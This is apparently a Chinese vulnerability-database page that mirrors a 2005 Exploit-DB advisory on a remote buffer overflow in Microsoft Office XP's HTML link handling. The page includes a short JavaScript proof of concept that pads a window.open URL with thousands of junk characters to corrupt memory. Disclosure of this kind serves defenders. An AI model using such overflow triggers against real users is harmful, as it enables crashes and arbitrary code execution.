Microsoft Office XP 2000/2002 – HTML Link Processing Remote Buffer Overflow

Microsoft Office XP 2000/2002 – HTML Link Processing Remote Buffer Overflow

漏洞ID 1054890 漏洞类型
发布时间 2005-02-08 更新时间 2005-02-08
图片[1]-Microsoft Office XP 2000/2002 – HTML Link Processing Remote Buffer Overflow-安全小百科CVE编号 N/A
图片[2]-Microsoft Office XP 2000/2002 – HTML Link Processing Remote Buffer Overflow-安全小百科CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/25085
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/12480/info

A remote buffer overflow vulnerability affects Microsoft Office XP. The problem presents itself when an unsuspecting user follows a malicious HTML link that points to a Office document. A boundary condition error is exposed during this operation that may allow attacker-specified data to corrupt process memory.

An attacker may leverage this issue to execute arbitrary code with the privileges of an unsuspecting user that follows a malicious embedded link.

<Script>
var mylongstring,myjunk;
mylongstring ="";
myjunk="bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
bbbbbbbbbbbbbbbbbbb";
for(c=1;c<5000;c++)
{
mylongstring = mylongstring + myjunk;
}
window.open("http://www.hhs.gov/ocr/privacysummary.rtf%0a"+mylongstring);
</script>

相关推荐: Linux/x86 – Bind (5074/TCP) Shell Shellcode (92 bytes)

Linux/x86 – Bind (5074/TCP) Shell Shellcode (92 bytes) 漏洞ID 1054607 漏洞类型 发布时间 2004-09-12 更新时间 2004-09-12 CVE编号 N/A CNNVD-ID N/A 漏洞…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享